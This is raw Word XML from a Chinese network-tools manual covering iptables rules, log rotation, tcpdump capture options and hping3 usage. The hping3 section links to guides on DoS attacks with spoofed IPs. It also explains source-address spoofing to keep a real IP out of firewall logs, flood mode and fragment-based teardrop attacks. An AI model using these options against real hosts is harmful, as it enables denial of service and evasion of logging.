ACCEPT，也可以是用户自定义的链。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-h：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显示帮助信息；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6" w:id="36"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>基本参数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iptables 命令常用的选项及各自的功能如表 2 所示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935"/>
        <w:gridCol w:w="3225"/>
      </w:tblGrid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选 项      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 能</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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-A     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添加防火墙规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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-D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删除防火墙规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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-I       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插入防火墙规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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-F      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清空防火墙规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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-L      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列出添加防火墙规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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-R      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替换防火墙规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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-Z      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清空防火墙数据表统计信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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-P       </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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设置链默认规则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iptables 命令常用匹配参数及各自的功能如表 3 所示。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410"/>
        <w:gridCol w:w="6870"/>
      </w:tblGrid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参 数      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 能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[!]-p      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匹配协议，! 表示取反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[!]-s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匹配源地址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[!]-d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匹配目标地址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[!]-i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匹配入站网卡接口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[!]-o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匹配出站网卡接口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[!]--sport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匹配源端口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[!]--dport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匹配目标端口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[!]--src-range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匹配源地址范围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[!]--dst-range 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匹配目标地址范围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[!]--limit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四配数据表速率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[!]--mac-source  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匹配源MAC地址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[!]--sports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匹配源端口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[!]--dports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匹配目标端口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[!]--stste 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匹配状态（INVALID、ESTABLISHED、NEW、RELATED)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[!]--string </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="68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匹配应用层字串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      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iptables 命令触发动作及各自的功能如表 4 所示。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950"/>
        <w:gridCol w:w="3375"/>
      </w:tblGrid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触发动作      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功 能</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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ACCEPT   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允许数据包通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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DROP 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丢弃数据包</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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REJECT  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拒绝数据包通过 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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LOG  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将数据包信息记录 syslog 曰志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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DNAT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目标地址转换</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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SNAT  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源地址转换    </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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MASQUERADE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地址欺骗</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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REDIRECT  </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="33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重定向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7" w:id="37"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.2.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t> iptables基本操作指令</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37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8" w:id="38"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>启动iptables规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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systemctl stop firewalld &amp;&amp; systemctl disable firewalld</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>systemctl start iptables &amp;&amp; systemctl enable iptables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9" w:id="39"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看iptables规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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iptables -L         # 查看iptables规则</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>$ iptables -L -vn   # 查看iptables规则(详细信息)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0" w:id="40"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>清空iptables规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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iptables -F    # 清除所有规则，不会处理默认的规则</w:t>
              <w:br/>
              <w:t>$ iptables -X   # 删除用户自定义的链</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>$ iptables -Z   # 链的计数器清零(数据包计数器与数据包字节计数器)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1" w:id="41"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t> 添加iptables规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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iptables -t     # 指定表(default: `filter')</w:t>
              <w:br/>
              <w:t>$ iptables -A   # 把规则添加到指定的链上，默认添加到最后一行</w:t>
              <w:br/>
              <w:t>$ iptables -I    # 插入规则，默认插入到第一行(封IP)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>$ iptables -D   # 删除链上的规则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2" w:id="42"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>删除iptables规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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iptables -nL --line-numbers       # 查看规则号码</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>$ iptables -D INPUT 1               # 删除指定链上的指定序号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3" w:id="43"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代理转发功能</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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iptables -t nat -A OUTPUT -p tcp -d 127.0.0.1 --dport 3000 -j DNAT --to-destination 127.0.0.1:13190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4" w:id="44"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>日志记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44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5" w:id="45"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>22端口记入日志</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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iptables -I INPUT -p tcp --dport 22 -j LOG</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>iptables -A INPUT -s 127.0.0.1 -p icmp -j LOG --log-prefix "iptables icmp-localhost "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6" w:id="46"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 数据加标记</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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iptables-I INPUT-j MARK --set-mark 4</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>iptables -t mangle -A PREROUTING -j MARK --set-mark 50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7" w:id="47"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>日志位置修改</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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日志默认位置在</w:t>
              <w:br/>
              <w:t>/var/log/messages</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>设置修改位置在</w:t>
              <w:br/>
              <w:t>/etc/logrotate.d/rsyslog</w:t>
              <w:br/>
              <w:br/>
              <w:t>rotate 4 # 保留4份日志</w:t>
              <w:br/>
              <w:t>weekly # 每周轮换一次</w:t>
              <w:br/>
              <w:t>postrotate # 轮换之后重启syslogd服务</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>endscript # –表示脚本结束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注linux，日志配置在/etc/logrotate.d/下文件里配置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8" w:id="48"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>源码下载地址</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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https://www.netfilter.org/pub/iptables/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9" w:id="49"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>tcpdump工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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0" w:id="50"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>说明</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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tcpdump host 192.168.10.100</w:t>
              <w:br/>
              <w:t>$ tcpdump src host 192.168.10.100</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>$ tcpdump tcp src host 192.168.10.100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1" w:id="51"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump 检测固定网口 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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tcpdump -i bridge0 host 192.168.225.1 </w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t xml:space="preserve">固定端口 </w:t>
              <w:br/>
              <w:t xml:space="preserve">tcpdump -i any dst port 143 </w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>固定ip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tcpdump host 192.168.225.1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2" w:id="52"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>常用参数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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-w 选项：将流量保存到文件中</w:t>
              <w:br/>
              <w:t>tcpdump -i ens39 -w tcp.tx</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>-r 选项：读取raw packets文件</w:t>
              <w:br/>
              <w:t>tcpdump -r tcp.txt</w:t>
              <w:br/>
              <w:br/>
              <w:t>过滤流量</w:t>
              <w:br/>
              <w:t>只抓udp的包</w:t>
              <w:br/>
              <w:t>tcpdump -i ens39 -c 1 'udp'</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>源和目标主机</w:t>
              <w:br/>
              <w:t>专门查看源机器和目的机器之间的网络包，只要设置src（source）和dst (destination)，而且tcpdump还支持使用and和or来进行搭配组合。</w:t>
              <w:br/>
              <w:t>tcpdump -i ens39 -c 1 'dst 192.168.146.131'</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>只关注特定端口</w:t>
              <w:br/>
              <w:t>tcpdump -i ens39 -c 2 'dst port 22 or dst port 80'</w:t>
              <w:br/>
              <w:t> </w:t>
              <w:br/>
              <w:t>只关注特定端口</w:t>
              <w:br/>
              <w:t>只想看到目的端口22和80端口，其他的不关注</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>tcpdump -i ens39 -c 2 'dst port 22 or dst port 80'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3" w:id="53"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>参数详解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53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-i interface: 设置抓取的网卡名（可以使用 -i any 抓取所有网卡的数据包）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-i eth0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-D: 列出可用的网卡列表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sudo tcpdump -D</w:t>
              <w:br/>
              <w:t>eth0</w:t>
              <w:br/>
              <w:t>nflog (Linux netfilter log (NFLOG) interface)</w:t>
              <w:br/>
              <w:t>nfqueue (Linux netfilter queue (NFQUEUE) interface)</w:t>
              <w:br/>
              <w:t>usbmon1 (USB bus number 1)</w:t>
              <w:br/>
              <w:t>any (Pseudo-device that captures on all interfaces)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>lo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-w file: 把捕获的包数据写入到文件中（可以使用 -w - 输出到标准输出）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-i eth0 -w debug.cap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-C size: 使用 -w 写入文件时，限制文件的最大大小，超出时新开一个文件（单位是 1,000,000 bytes）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sudo tcpdump -i eth0 -w debug.cap -C 1</w:t>
              <w:br/>
              <w:t>$ ls debug* -l</w:t>
              <w:br/>
              <w:t>-rw-r--r-- 1 tcpdump tcpdump 1000956 Jan 14 10:16 debug.cap</w:t>
              <w:br/>
              <w:t>-rw-r--r-- 1 tcpdump tcpdump 1000323 Jan 14 10:32 debug.cap1</w:t>
              <w:br/>
              <w:t>-rw-r--r-- 1 tcpdump tcpdump 1000017 Jan 14 10:51 debug.cap2</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>-rw-r--r-- 1 tcpdump tcpdump  970705 Jan 14 11:08 debug.cap3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-r file: 从文件中读取包数据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-r debug.cap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-v: 启用 verbose output，抓包时输出包的附加信息（可以使用多个 -v: -v, -vv, -vvv 多个 v 会显示更多更详细的信息）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-v</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>tcpdump -vv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-A: 以 ASCII 码方式显示每一个数据包(不会显示数据包中链路层头部信息). 在抓取包含网页数据的数据包时, 可方便查看数据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-x: 打印每个包的头部数据, 同时会以16进制打印出每个包的数据(但不包括连接层的头部)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-xx: 打印每个包的头部数据, 同时会以16进制打印出每个包的数据, 其中包括数据链路层的头部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-X: 打印每个包的头部数据, 同时会以16进制和 ASCII 码形式打印出每个包的数据(但不包括连接层的头部)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-XX: 打印每个包的头部数据, 同时会以16进制和 ASCII 码形式打印出每个包的数据, 其中包括数据链路层的头部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-c count: 设置抓取到多少个包后就退出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-i eth0 -c 100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-n: 不要把地址转换为主机名（直接显示 ip 不要解析为域名）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-nn: 不要把转换协议和端口号（直接显示协议和端口号，不要转换为协议名称，比如 http）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-nn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-s snaplen: 设置 tcpdump 的数据包抓取长度为 snaplen , 为 0 时表示让 tcpdump 自动选择合适的长度来抓取数据包.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-s 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-S: 打印TCP 数据包的顺序号时, 使用绝对的顺序号, 而不是相对的顺序号.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tcpdump -S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-Z user: 使tcpdump 放弃自己的超级权限(如果以root用户启动tcpdump, tcpdump将会有超级用户权限), 并把当前tcpdump的用户ID设置为user, 组ID设置为user首要所属组的ID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tcpdump -Z user2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常用的参数组合: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tcpdump -i eth0 -nnS -s 0 -c 100 -Avvv [&lt;expression&gt;]</w:t>
              <w:br/>
              <w:t>sudo tcpdump -i eth0 -nnS -s 1024 -c 100 -Avvv [&lt;expression&gt;]</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sudo tcpdump -i eth0 -nnS -s 1024 -C 10 -c 10000 -v -w debug.cap [&lt;expression&gt;]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 tcpdump 会抓取所有的数据，可以通过指定过滤规则来过滤数据包。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4" w:id="54"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>hping3工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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5" w:id="55"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>工具网址</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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1、hping3命令：                                                                                            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http://man.linuxde.net/hping3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2、Testing firewall rules with Hping3 - examples：                       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>http://0daysecurity.com/articles/hping3_examples.html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3、攻防宝典：利用hping3和伪造IP地址执行DOS攻击：      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http://netsecurity.51cto.com/art/201508/489303.htm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4、DoS***方法（hping3）：                                   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http://19920624.blog.51cto.com/9632075/1584465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5、Nmap、Netcat、Hping3工具对比：                             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http://www.2cto.com/article/201210/158961.html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6" w:id="56"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>hping3用法 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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用法: hping3 host [options]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755"/>
        <w:gridCol w:w="6525"/>
      </w:tblGrid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-h  --help   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显示帮助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-v  --version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显示版本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-c  --count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发送数据包的数目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-i  --interval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--fast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--faster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--flood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发送数据包间隔的时间 (uX即X微秒, 例如： -i u1000)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       等同 -i u10000 (每秒100个包)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       等同 -i u1000 (每秒1000个包)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       尽最快发送数据包，不显示回复。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-n  --numeric    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数字化输出，象征性输出主机地址。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-q  --quiet      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安静模式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-I  --interface X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网卡接口 (默认路由接口)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-V  --verbose   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详细模式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-D  --debug      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调试信息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-z  --bind      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绑定ctrl+z到ttl(默认为目的端口)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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-Z  --unbind   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 --beep      </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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取消绑定ctrl+z键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对于接收到的每个匹配数据包蜂鸣声提示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7" w:id="57"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>模式选择</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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default mode     TCP   // 默认模式是 TCP</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -0  --rawip      RAWIP模式，原始IP模式。在此模式下HPING会发送带数据的IP头。即裸IP方式。使用RAWSOCKET方式。</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -1  --icmp       ICMP模式，此模式下HPING会发送IGMP应答报，你可以用--ICMPTYPE --ICMPCODE选项发送其他类型/模式的ICMP报文。</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -2  --udp        UDP 模式，缺省下，HPING会发送UDP报文到主机的0端口，你可以用--baseport --destport --keep选项指定其模式。</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -8  --scan       SCAN mode. //扫描模式 指定扫描对应的端口。</w:t>
              <w:br/>
              <w:t xml:space="preserve">                   Example: hping --scan 1-30,70-90 -S www.target.host    // 扫描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-9  --listen     listen mode  // 监听模式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8" w:id="58"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>IP 模式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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-a  --spoof      spoof source address  //源地址欺骗。伪造IP攻击，防火墙就不会记录你的真实IP了，当然回应的包你也接收不到了。</w:t>
              <w:br/>
              <w:t xml:space="preserve">  --rand-dest      random destionation address mode. see the man. // 随机目的地址模式。详细使用 man 命令</w:t>
              <w:br/>
              <w:t xml:space="preserve">  --rand-source    random source address mode. see the man.       // 随机源地址模式。详细使用 man 命令</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -t  --ttl        ttl (默认 64)  //修改 ttl 值</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -N  --id         id (默认 随机)  // hping 中的 ID 值，缺省为随机值</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -W  --winid      使用win* id字节顺序  //使用winid模式，针对不同的操作系统。UNIX ,WINDIWS的id回应不同的，这选项可以让你的ID回应和WINDOWS一样。</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -r  --rel        相对id字段(估计主机流量)  //更改ID的，可以让ID曾递减输出，详见HPING-HOWTO。</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -f  --frag       拆分数据包更多的frag.  (may pass weak acl)   //分段，可以测试对方或者交换机碎片处理能力，缺省16字节。</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -x  --morefrag   设置更多的分段标志    // 大量碎片，泪滴攻击。</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -y  --dontfrag   设置不分段标志    // 发送不可恢复的IP碎片，这可以让你了解更多的MTU PATH DISCOVERY。</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -g  --fragoff    set the fragment offset    // 设置断偏移。</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -m  --mtu        设置虚拟最大传输单元, implies --frag if packet size &gt; mtu    // 设置虚拟MTU值，当大于mtu的时候分段。</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -o  --tos        type of service (default 0x00), try --tos help          // tos字段，缺省0x00，尽力而为？</w:t>
              <w:br/>
              <w:t xml:space="preserve">  -G  --rroute     includes RECORD_ROUTE option and display the route buffer    // 记录IP路由，并显示路由缓冲。</w:t>
              <w:br/>
              <w:t xml:space="preserve">  --lsrr           松散源路由并记录路由        // 松散源路由</w:t>
              <w:br/>
              <w:t xml:space="preserve">  --ssrr           严格源路由并记录路由      // 严格源路由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-H  --ipproto    设置IP协议字段，仅在RAW IP模式下使用   //在RAW IP模式里选择IP协议。设置ip协议域，仅在RAW ip模式使用。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9" w:id="59"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3370ff"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3.2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
